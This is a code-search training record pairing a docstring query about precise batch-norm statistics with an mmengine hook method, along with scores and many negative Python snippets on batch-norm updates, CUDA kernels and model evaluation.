tic = time.time()\n means = []\n stds = []\n steps = 0\n scores_window = deque(maxlen=100)\n for e in range(1,self.episodes):\n\n self.noise.step()\n episode_scores = []\n obs = self.env.reset()\n for t in range(self.tmax):\n actions = self.act(obs)\n next_obs,rewards,dones = self.env.step(actions)\n\n # Store experience\n if np.max(rewards) > 0:\n print('hit the ball over the net',rewards)\n self.R.add(obs.reshape(1,48),obs,actions,rewards,next_obs.reshape(1,48),next_obs,dones)\n obs = next_obs\n # Score tracking\n episode_scores.append(np.max(rewards))\n \n # Learn\n if len(self.R) > self.min_buffer_size:\n for _ in range(self.SGD_epoch):\n # Update each agent\n for i in range(self.num_agents):\n self.learn(i)\n # update target networks\n self.update_targets_all()\n \n steps += int(t)\n means.append(np.mean(episode_scores))\n stds.append(np.std(episode_scores))\n scores_window.append(np.sum(episode_scores))\n if e % 4 == 0:\n toc = time.time()\n r_mean = np.mean(scores_window)\n r_max = max(scores_window)\n r_min = min(scores_window)\n r_std = np.std(scores_window)\n plot(self.name,means,stds)\n print(\"\\rEpisode: {} out of {}, Steps {}, Rewards: mean {:.2f}, min {:.2f}, max {:.2f}, std {:.2f}, Elapsed {:.2f}\".format(e,self.episodes,steps,r_mean,r_min,r_max,r_std,(toc-tic)/60))\n if np.mean(scores_window) > self.winning_condition:\n print('Env solved!')\n # save scores\n pickle.dump([means,stds], open(str(self.name)+'_scores.p', 'wb'))\n # save policy\n self.save_weights(self.critic_path,self.actor_path)\n break" ]
[ "0.6964537", "0.6422349", "0.63577896", "0.6318661", "0.6236532", "0.6216655", "0.6173939", "0.60070693", "0.59611785", "0.5951854", "0.58218586", "0.5805479", "0.5786752", "0.57796615", "0.57740426", "0.57325435", "0.57291657", "0.571751", "0.56999123", "0.5690688", "0.56904423", "0.568779", "0.56871575", "0.5680458", "0.5670092", "0.56660396", "0.5663649", "0.56576085", "0.564947", "0.5603945", "0.56011486", "0.5599958", "0.5592951", "0.55923504", "0.5582438", "0.55750716", "0.55744994", "0.55709684", "0.55633473", "0.5558686", "0.5551512", "0.5540964", "0.55407345", "0.55384856", "0.5534188", "0.55255836", "0.552363", "0.5521491", "0.5515085", "0.5510376", "0.54997087", "0.54946816", "0.5493553", "0.5472046", "0.5454513", "0.5453712", "0.5448064", "0.54478925", "0.5444799", "0.5440005", "0.5436026", "0.5432931", "0.54321665", "0.54201144", "0.5418753", "0.54173696", "0.5413845", "0.5412628", "0.5411666", "0.5410925", "0.5409974", "0.5409317", "0.5406067", "0.5406067", "0.5399216", "0.53926075", "0.53899986", "0.53879297", "0.5387774", "0.5387769", "0.5386495", "0.538619", "0.5379525", "0.5378686", "0.53739053", "0.5368575", "0.5366874", "0.5366621", "0.53615993", "0.5359074", "0.53584814", "0.535658", "0.5354624", "0.5353833", "0.53512335", "0.53506243", "0.5350498", "0.5347494", "0.534357", "0.53432393" ]
0.6554783
1
Calculate precise BN and broadcast BN stats across GPUs.
def after_train_epoch(self, runner: Runner) -> None:
    # if use `EpochBasedTrainLoop`, perform precise BN every
    # `self.interval` epochs.
    if isinstance(runner.train_loop,
                  EpochBasedTrainLoop) and self.every_n_epochs(
                      runner, self.interval):
        self._perform_precise_bn(runner)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_precise_bn_stats(model, loader):\n # Compute the number of minibatches to use\n num_iter = min(cfg.BN.NUM_SAMPLES_PRECISE // loader.batch_size, len(loader))\n # Retrieve the BN layers\n bns = [m for m in model.modules() if isinstance(m, torch.nn.BatchNorm2d)]\n # Initialize stats storage\n mus = [torch.zeros_like(bn.running_mean) for bn in bns]\n sqs = [torch.zeros_like(bn.running_var) for bn in bns]\n # Remember momentum values\n moms = [bn.momentum for bn in bns]\n # Disable momentum\n for bn in bns:\n bn.momentum = 1.0\n # Accumulate the stats across the data samples\n for inputs, _labels in itertools.islice(loader, num_iter):\n model(inputs.cuda())\n # Accumulate the stats for each BN layer\n for i, bn in enumerate(bns):\n m, v = bn.running_mean, bn.running_var\n sqs[i] += (v + m * m) / num_iter\n mus[i] += m / num_iter\n # Set the stats and restore momentum values\n for i, bn in enumerate(bns):\n bn.running_var = sqs[i] - mus[i] * mus[i]\n bn.running_mean = mus[i]\n bn.momentum = moms[i]", "def update_bn_stats(\n model: nn.Module,\n loader: DataLoader,\n num_samples: int = 8192,\n logger: Optional[Union[logging.Logger, str]] = None) -> None:\n if is_model_wrapper(model):\n model = model.module\n\n # get dist info\n rank, world_size = mmengine.dist.get_dist_info()\n # Compute the number of mini-batches to use, if the size of dataloader is\n # less than num_iters, use all the samples in dataloader.\n num_iter = num_samples // (loader.batch_size * world_size)\n num_iter = min(num_iter, len(loader))\n # Retrieve the BN layers\n bn_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_BatchNorm))\n ]\n if len(bn_layers) == 0:\n print_log('No BN found in model', logger=logger, level=logging.WARNING)\n return\n print_log(\n f'{len(bn_layers)} BN found, run {num_iter} iters...', logger=logger)\n\n # Finds all the other norm layers with training=True.\n other_norm_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_InstanceNorm, GroupNorm))\n ]\n if len(other_norm_layers) > 0:\n print_log(\n 'IN/GN stats will not be updated in PreciseHook.',\n logger=logger,\n level=logging.INFO)\n\n # Initialize BN stats storage for computing\n # mean(mean(batch)) and mean(var(batch))\n running_means = [torch.zeros_like(bn.running_mean) for bn in bn_layers]\n running_vars = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n # Remember momentum values\n momentums = [bn.momentum for bn in bn_layers]\n # Set momentum to 1.0 to compute BN stats that reflect the current batch\n for bn in bn_layers:\n bn.momentum = 1.0\n # Average the BN stats for each BN layer over the batches\n if rank == 0:\n prog_bar = ProgressBar(num_iter)\n\n for data in itertools.islice(loader, num_iter):\n data = model.data_preprocessor(data, False)\n model(**data)\n\n for i, bn in enumerate(bn_layers):\n running_means[i] += bn.running_mean / num_iter\n running_vars[i] += bn.running_var / num_iter\n if rank == 0:\n prog_bar.update()\n\n # Sync BN stats across GPUs (no reduction if 1 GPU used)\n running_means = scaled_all_reduce(running_means, world_size)\n running_vars = scaled_all_reduce(running_vars, world_size)\n # Set BN stats and restore original momentum values\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_means[i]\n bn.running_var = running_vars[i]\n bn.momentum = momentums[i]", "def ComputeNrb(self):\r\n pass", "def _init_CodeRateAndPhaseBuffers(self):\n\n # Grid and blocks\n MAX_BLOCK_X = 1024 # current limit (32 warps of 32 threads = 1024 which 
is max block size x)\n numThreads = int(np.min((self.CUDA_WARP_SIZE * self.CUDA_NUM_WARPS, MAX_BLOCK_X))) # TODO: check with atomic operation to allow more than 32 warps\n \n self.block_codeMax = (numThreads,1,1)\n self.grid_codeMax = (1,1) # we only want one grid at the moment. Maybe 2 later, but need to implement atomic operation in the algorithm first!\n self.block_codeXCorrSum = (int(self.CUDA_NUM_THREADS/self.CUDA_NUM_SMX),1,1) # 1 block pr \n self.grid_codeXCorrSum = (int(self.CUDA_NUM_SMX*4),1) # Make some more grids than SMX's, so there is plenty to do for the GPU while it is waiting for data\n\n ## buffers\n self.GPU_bufCodeAndPhase = cuda.mem_alloc(int(self.Nfft*np.float32().nbytes)) # output of sum is real, In place R2C fft uses Nfft/2*complex64 bytes which is same length as Nfft*float32\n self.GPU_bufCodeAndPhaseOut = cuda.mem_alloc(int(self.Nfft*np.complex64().nbytes)) # for arrays of len >= 2**20, the in-place R2C transform does not seem to work\n self.GPU_buffers.append(self.GPU_bufCodeAndPhase)\n self.GPU_bufCodeAndPhaseResult = cuda.mem_alloc(np.float32().nbytes*3) # holds [index of max (offset complensated), argument of max (normalized), value of max]\n self.GPU_buffers.append(self.GPU_bufCodeAndPhaseResult)\n \n ## fft Plan\n self.fftPlan_codeRate_R2C = cufft.cufftPlan1d(self.Nfft,cufft.CUFFT_R2C,1) # R2C, 1 batch\n self.GPU_fftPlans.append(self.fftPlan_codeRate_R2C)\n\n ## CUDA kernels\n self.GPU_sumXCorrBuffMasks = self.CudaKernels.get_function('sumXCorrBuffMasks').prepare('PPi')\n self.GPU_findCodeRateAndPhase = self.CudaKernels.get_function('findCodeRateAndPhase').prepare('PPii')\n ## constants\n self.symsTolLow = 0.9*self.spsym # Ignore low symbol rates. avoids locking onto harmonics\n self.symsTolHigh = 1.1*self.spsym # Ignore high symbol rates (avoids false results due to slow noise and DC)\n\n self.codeRateAndPhaseOffsetLow = int(self.Nfft/self.symsTolLow)\n self.codeRateAndPhaseOffsetHigh = int(self.Nfft/self.symsTolHigh)\n ## numpy buffers\n self.__CodeRateAndPhaseResult = np.empty(3,dtype=np.float32) # holds [index of max (offset complensated), argument of max (normalized), value of max]", "def calc(self):\n self.proc_blocks = [cluster.cells for cluster in self.clusters]\n self.cell_loads = [sum([len(cell) for cell in self.proc_blocks])]\n self.particle_loads = [cluster.np for cluster in self.clusters]\n self.imbalance = LoadBalancer.get_load_imbalance(self.particle_loads)", "def __initializeKernels(self):\n # FFT plans:\n self.__initializeDopplerIfftPlan() # for Doppler Ifft\n self.__initializeDemodIfftPlan() # for demod \n self.__initializeSNRFftPlan() # for findSNR\n \n # GPU kernels\n kernel = self.CudaKernels\n ## kernels for initialization\n self.GPU_multInputVectorWithMasks = kernel.get_function('multInputVectorWithMasks').prepare('PPP')\n \n self.GPU_complexConj = kernel.get_function('complexConj').prepare('P')\n self.GPU_scaleComplexByScalar = kernel.get_function('scaleComplexByScalar').prepare('Pf')\n self.GPU_setComplexArrayToZeros = kernel.get_function('setComplexArrayToZeros').prepare('P')\n \n ## kernels for doppler search\n self.GPU_filterMasks = kernel.get_function('multInputVectorWithShiftedMasksDopp').prepare('PPPPii')\n # for multInputVectorWithShiftedMasks\n self.numBlocks = self.Nfft/self.numThreads\n self.bShapeVecMasks = (int(self.numThreads),1,1)\n self.gShapeVecMasks = (int(self.numBlocks),1)\n assert self.bShapeVecMasks[0]*self.gShapeVecMasks[0]==self.Nfft,'Dimension mismatch'\n\n self.GPU_absSumDoppler = 
kernel.get_function('blockAbsSumAtomic').prepare('PPi')\n # for the absSumKernel to sum the rows together\n self.bShapeAbsSum = (128,1,1) # 128 and 2 in next line is just picked TODO: should be config val\n self.gShapeAbsSum = (2,int(self.doppIdxArrayLen)) # tweak these\n\n assert self.Nfft % self.bShapeAbsSum[0]*self.gShapeAbsSum[0] == 0,'Nfft has to be dividable by block and grid dimensions'\n\n self.GPU_estDoppler = kernel.get_function('findDopplerEst').prepare('PPPii')\n # for the small kernel that finds the doppler\n self.bShapeDopp = (self.num_masks,1,1)\n self.gShapeDopp = (1,1)\n\n self.GPU_setArrayToZeros = kernel.get_function('setArrayToZeros').prepare('P')\n # for the set to zero kernel for the sum\n self.bShapeZero = (int(self.num_masks),1,1)\n self.gShapeZero = (int(self.doppIdxArrayLen),1)\n\n ## for demodulation\n self.bShapeVecMasks2 = (int(256),1,1) ## 256 is just picked, TODO: should be config val\n self.gShapeVecMasks2 = (int(self.Nfft/self.bShapeVecMasks2[0]),1)\n self.complexShiftMulMasks = kernel.get_function('multInputVectorWithShiftedMask').prepare('PPPi')\n self.complexHeterodyne = kernel.get_function('complexHeterodyne').prepare('PPfffi')\n self.findcentres = kernel.get_function('findCentres').prepare('PPPPffii')\n self.bShapeCentres = (256,1,1) ## 256 is just picked, TODO: should be config val", "def update(self, rxn_probs):\n pass", "def compute(self) -> Tensor:\n\n if self.samples:\n return self.average_precisions.float() / self.total\n else:\n # pred_image_indices = torch.cat(self.pred_image_indices, dim=0)\n pred_probs = torch.cat(self.pred_probs, dim=0)\n pred_labels = torch.cat(self.pred_labels, dim=0)\n pred_bboxes = torch.cat(self.pred_bboxes, dim=0)\n\n # target_image_indices = torch.cat(self.target_image_indices, dim=0)\n target_labels = torch.cat(self.target_labels, dim=0)\n target_bboxes = torch.cat(self.target_bboxes, dim=0)\n\n # pred_index = torch.nonzero((pred_labels == 1))\n # pred_probs = pred_probs[pred_index]\n # pred_bboxes = pred_bboxes[pred_index]\n # target_index = torch.nonzero((target_labels == 1))\n # target_bboxes = target_bboxes[target_index]\n\n\n # _, index_sorted = torch.sort(pred_probs)\n # pred_bboxes = pred_bboxes[index_sorted].cpu().detach().numpy()\n # target_bboxes = target_bboxes.cpu().detach().numpy()\n pred_probs = pred_probs.cpu().detach().numpy()\n pred_labels = pred_labels.cpu().detach().numpy()\n pred_bboxes = pred_bboxes.cpu().detach().numpy()\n target_labels = target_labels.cpu().detach().numpy()\n target_bboxes = target_bboxes.cpu().detach().numpy()\n\n pred_probs = pred_probs[pred_labels == 1]\n pred_bboxes = pred_bboxes[pred_labels == 1]\n target_bboxes = target_bboxes[target_labels == 1]\n\n preds_sorted_idx = np.argsort(pred_probs)[::-1]\n pred_bboxes = pred_bboxes[preds_sorted_idx]\n\n x, y = calculate_precision_recall(target_bboxes, pred_bboxes)\n\n if len(x) >= 2:\n return auc(x, y)\n else:\n return 0\n\n # return mean_average_precision(\n # pred_image_indices,\n # pred_probs,\n # pred_labels,\n # pred_bboxes,\n # target_image_indices,\n # target_labels,\n # target_bboxes,\n # self.iou_threshold,\n # self.ap_calculation,\n # )", "def reset_bn_stats(model):\n for m in model.modules():\n if isinstance(m, torch.nn.BatchNorm2d):\n m.reset_running_stats()", "def update_bn_stats(\n model: nn.Module,\n data_loader: Iterable[Any],\n num_iters: int = 200,\n by_epoch: bool = False):\n bn_layers = get_bn_modules(model)\n\n if len(bn_layers) == 0:\n return\n\n momentum_actual = [bn.momentum for bn in bn_layers]\n for bn 
in bn_layers:\n bn.momentum = 1.0\n\n running_mean = [\n torch.zeros_like(bn.running_mean) for bn in bn_layers\n ]\n running_var = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n\n if by_epoch:\n num_iters = num_iters * len(data_loader)\n\n iter_loader = IterLoader(data_loader)\n ind = -1\n with tqdm(total=num_iters) as pbar:\n pbar.set_description('Calculating running stats')\n while ind < num_iters:\n data_batch = next(iter_loader)\n output = model(data_batch['img'])\n\n ind += 1\n for i, bn in enumerate(bn_layers):\n running_mean[i] += (bn.running_mean - running_mean[i]) / (ind + 1)\n running_var[i] += (bn.running_var - running_var[i]) / (ind + 1)\n\n pbar.update(1)\n\n assert ind == num_iters, (\n \"update_bn_stats is meant to run for {} iterations, \"\n \"but the dataloader stops at {} iterations.\".format(num_iters, ind)\n )\n\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_mean[i]\n bn.running_var = running_var[i]\n bn.momentum = momentum_actual[i]", "def main():\n\n # Create an empty array to hold our points.\n n = gpuarray.zeros(shape=(x, y, z),\n dtype=gpuarray.vec.float3)\n\n # Populate the array with randomized points from the search space.\n for k in range(z):\n for j in range(y):\n for i in range(x):\n n[i, j, k] = gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-depth, depth))\n\n # Declare our elementwise CUDA kernel.\n mod = Elementwise(\n arguments=\"float3 pt, float3 *ns, float *rs\",\n operation=\"rs[i] = sqrt(pow(pt.x-ns[i].x,2)+pow(pt.y-ns[i].y,2)+pow(pt.z-ns[i].z,2))\",\n name=\"euclidean_distance\",\n preamble=\"#include <math.h>\"\n )\n\n # Declare an empty results array.\n r = gpuarray.zeros(shape=(50, 50, 2), dtype=numpy.float32)\n start = cuda.Event()\n end = cuda.Event()\n start.record()\n # Call the kernel with a randomize point from the search space.\n mod(gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-width, width)), n, r)\n end.record()\n end.synchronize()\n print((start.time_till(end)))\n print(r)", "def calcError(net, net_labels, dataset_name, dataloader, dataset, doGPU):\n # note: net_labels is a list of pairs (RAP_name, PETA_name) of attribute names\n net_attr_nbr = len(net_labels)\n assert (net_attr_nbr == 49)\n \n total = 0\n correct = 0\n batch_nbr = 0\n per_attrib_total = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_correct = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_1_pred = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_class_accuracy = torch.zeros([net_attr_nbr], dtype=torch.float) # size [92]\n if doGPU:\n per_attrib_total = per_attrib_total.cuda()\n per_attrib_correct = per_attrib_correct.cuda()\n per_attrib_1_pred = per_attrib_1_pred.cuda()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cuda()\n \n with torch.no_grad():\n # loop over batches\n # accumulate per-attribute and total number of correct predictions\n for i_batch, sample_batched in enumerate(dataloader):\n assert (sample_batched['image'].shape[1:] == (3,128,48)), \"wrong image size\"\n batch_nbr += 1\n real_batch_size = sample_batched['image'].shape[0]\n total += real_batch_size * net_attr_nbr\n per_attrib_total += real_batch_size # size [net_attr_nbr]\n assert (per_attrib_total.sum().item() == total)\n try:\n assert (batch_nbr == math.ceil(per_attrib_total[0].item()/Param_Batchsize))\n except AssertionError:\n ipdb.set_trace()\n pass\n\n\n # 
prepare data for prediction\n if doGPU:\n inp = Variable(sample_batched['image'].float().cuda())\n else:\n inp = Variable(sample_batched['image'].float())\n\n # retrieve ground truth\n dataset_lab_gt = sample_batched['label'] # shape == [50,NB_ATTRIB]\n\n # convert ground truth to model attributes\n if dataset_name == 'datasetRAPPETA':\n assert (dataset_lab_gt.shape[1] == 49)\n # no conversion needed, use ground truth as it is\n lab_gt = dataset_lab_gt\n elif dataset_name == 'datasetRAP':\n assert (dataset_lab_gt.shape[1] == 92)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_RAP = [rap_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_RAP):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n elif dataset_name == 'datasetPETA':\n assert (dataset_lab_gt.shape[1] == 104)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_PETA = [peta_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_PETA):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n else:\n print('Unknown dataset \\'' + dataset_name + '\\'')\n sys.exit(1)\n\n # 'format' ground truth for Torch\n lab_gtv = Variable(lab_gt)\n if doGPU:\n lab_gtv = lab_gtv.cuda()\n\n # do prediction\n logits = net.forward(inp) # output without Sigmoid\n predictions = (logits > 0).int() # size [50, net_attr_nbr]\n assert (net_attr_nbr == predictions.shape[1])\n\n # accumulate total number of correct predictions\n correct += (lab_gtv == predictions).sum()\n\n # accumulate per-attribute number of correct predictions\n per_batch_and_attrib_correct = (lab_gtv == predictions) # size [50, net_attr_nbr]\n #if doGPU:\n # per_batch_and_attrib_correct = per_batch_and_attrib_correct.cpu()\n per_attrib_correct += per_batch_and_attrib_correct.sum(0) # size [net_attr_nbr]\n assert (per_attrib_correct.sum().item() == correct)\n\n # accumulate number of 1 predictions for each attribute\n per_attrib_1_pred += predictions.sum(0) # size [net_attr_nbr]\n\n # accumulate for class-accuracy\n per_batch_and_attrib_1_good_prediction = (predictions.byte() * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_good_prediction = ((1 - predictions.byte()) * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n assert torch.equal(per_batch_and_attrib_1_good_prediction + per_batch_and_attrib_0_good_prediction, per_batch_and_attrib_correct.sum(0))\n per_batch_and_attrib_1_ground_truth = lab_gtv.sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_ground_truth = (1 - lab_gtv).sum(0) #size [net_attr_nbr]\n try:\n assert torch.equal(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth, torch.tensor([real_batch_size] * net_attr_nbr).cuda())\n except AssertionError:\n print(\"per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth=\")\n print(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth)\n ipdb.set_trace()\n pass\n\n per_batch_and_attrib_recall_1 = per_batch_and_attrib_1_good_prediction.float() / per_batch_and_attrib_1_ground_truth.float() #size [net_attr_nbr]\n # nan values appear when ground_truth 
number of 1 value is 0\n # in this case, good_prediction can not be different of 0\n # (there can not be a good prediction of 1 because there is not\n # any 1 in the ground truth)\n # so a nan appears only when recall = 0 good pred / 0 case in ground truth\n # so recall=nan can be safely replaced by a recall=1\n person.replace_nan_by_one(per_batch_and_attrib_recall_1)\n per_batch_and_attrib_recall_0 = per_batch_and_attrib_0_good_prediction.float() / per_batch_and_attrib_0_ground_truth.float() #size [net_attr_nbr]\n person.replace_nan_by_one(per_batch_and_attrib_recall_0)\n # class_accuracy = mean(recall_of_0, recall_of_1)\n per_batch_and_attrib_class_accuracy = (per_batch_and_attrib_recall_0 + per_batch_and_attrib_recall_1) / 2.0 #size [net_attr_nbr]\n per_attrib_class_accuracy += per_batch_and_attrib_class_accuracy #size [net_attr_nbr]\n\n assert (total == (dataloader.dataset.__len__() * net_attr_nbr))\n \n if doGPU:\n per_attrib_total = per_attrib_total.cpu()\n per_attrib_correct = per_attrib_correct.cpu()\n per_attrib_1_pred = per_attrib_1_pred.cpu()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cpu()\n\n # compute per-attribute and global average prediction error\n err = (1.0-correct.item()/total)\n per_attrib_err = (1.0 - (per_attrib_correct.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float))) # size [net_attr_nbr]\n np.testing.assert_allclose(per_attrib_err.mean().item(), err, rtol=1e-5)\n\n # compute per-attribute number of 1 predictions\n per_attrib_1_pred_rate = 100 * (per_attrib_1_pred.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float)) # size [net_attr_nbr]\n\n # compute mean class_accuracy over batches\n per_attrib_class_accuracy = per_attrib_class_accuracy * 1.0 / batch_nbr \n\n return err, per_attrib_err, per_attrib_1_pred_rate, per_attrib_class_accuracy", "def __call__(self, epoch, update):\n ii=1\n count = 0\n list = []\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n while True:\n i, p = next(self.gen)\n if p.poll():\n grads = []\n for i, fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs * 4)\n grads.append(np.ndarray(self.shapes[i], np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv()\n\n count += 1\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n staleness = update - last_update\n else:\n ii += 1\n if ii % self.learners == 0:\n time.sleep(0.0001)\n if count == self.num:\n binning = 0\n for i in self.bins:\n if staleness >= i:\n binning += 1\n else:\n break\n self.bin_counts[binning] += 1\n logger.debug(\"staleness\", staleness, \"put in bin\", binning, flush=True)\n return gradients_list, from_list, global_update_list, step_list, metrics_list, binning, 2", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in 
sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def findCodeRateAndPhaseGPU(self):\n\n # Abs**2 sum all Masks \n self.GPU_sumXCorrBuffMasks.prepared_call(self.grid_codeXCorrSum,self.block_codeXCorrSum,\n self.GPU_bufCodeAndPhase,self.GPU_bufXcorr,np.int32(self.Nfft))\n\n # fft real to complex in-place output is Nfft/2*complex64 input is Nfft*float32\n cufft.cufftExecR2C(self.fftPlan_codeRate_R2C,int(self.GPU_bufCodeAndPhase),int(self.GPU_bufCodeAndPhaseOut))\n\n # find the code rate from the magnitude and phase from the argument\n\n self.GPU_findCodeRateAndPhase.prepared_call(self.grid_codeMax, self.block_codeMax,\n self.GPU_bufCodeAndPhaseResult,self.GPU_bufCodeAndPhaseOut,np.int32(self.codeRateAndPhaseOffsetHigh),np.int32(self.codeRateAndPhaseOffsetLow-self.codeRateAndPhaseOffsetHigh))\n\n if log.level == logging.DEBUG:\n log.debug(f'Code rate index: low {self.codeRateAndPhaseOffsetLow}\\t high {self.codeRateAndPhaseOffsetHigh}')\n cuda.memcpy_dtoh(self.__CodeRateAndPhaseResult,self.GPU_bufCodeAndPhaseResult)\n\n\n try:\n # compute symbol rate\n spSym = self.Nfft/self.__CodeRateAndPhaseResult[0]\n\n except:\n log.error(self.__CodeRateAndPhaseResult)\n log.error('Code rate result 0 
should not happen but happened -- fixing it to 10')\n spSym = 10\n \n \n try:\n # compute codeOffset\n codeOffset = -self.__CodeRateAndPhaseResult[1]/np.pi*spSym/2 #\n if codeOffset < 0: # wrap negative values\n codeOffset += spSym - 1\n except:\n log.warning('Error while computing code offset: codeOffset from GPU {}, index {}, max val {}'.format(self.__CodeRateAndPhaseResult[1],self.__CodeRateAndPhaseResult[0],self.__CodeRateAndPhaseResult[2]))\n codeOffset = 0\n\n return spSym, codeOffset", "def conv_bn_relu_forward(x, w, b, gamma, beta, conv_param, bn_param):\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n an, sbn_cache = spatial_batchnorm_forward(a, gamma, beta, bn_param)\n out, relu_cache = relu_forward(an)\n cache = (conv_cache, sbn_cache, relu_cache)\n return out, cache", "def collect_via_pynvml(self, stats_config):\n try:\n NVML_TEMPERATURE_GPU = 0\n pynvml.nvmlInit()\n device_count = pynvml.nvmlDeviceGetCount()\n\n for device_index in xrange(device_count):\n handle = pynvml.nvmlDeviceGetHandleByIndex(device_index)\n memoryInfo = pynvml.nvmlDeviceGetMemoryInfo(handle)\n utilizationRates = pynvml.nvmlDeviceGetUtilizationRates(handle)\n\n metrics = {\n 'memory.total': memoryInfo.total / 1024 / 1024,\n 'memory.used': memoryInfo.total / 1024 / 1024,\n 'memory.free': memoryInfo.free / 1024 / 1024,\n 'utilization.gpu': utilizationRates.gpu,\n 'utilization.memory': utilizationRates.memory,\n 'temperature.gpu':\n pynvml.nvmlDeviceGetTemperature(handle,\n NVML_TEMPERATURE_GPU)\n }\n\n for stat_name in stats_config[1:]:\n metric = metrics.get(stat_name)\n if metric:\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(device_index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)\n finally:\n pynvml.nvmlShutdown()", "def bn_update(loader, model):\n if not check_bn(model):\n return\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n for input, _ in 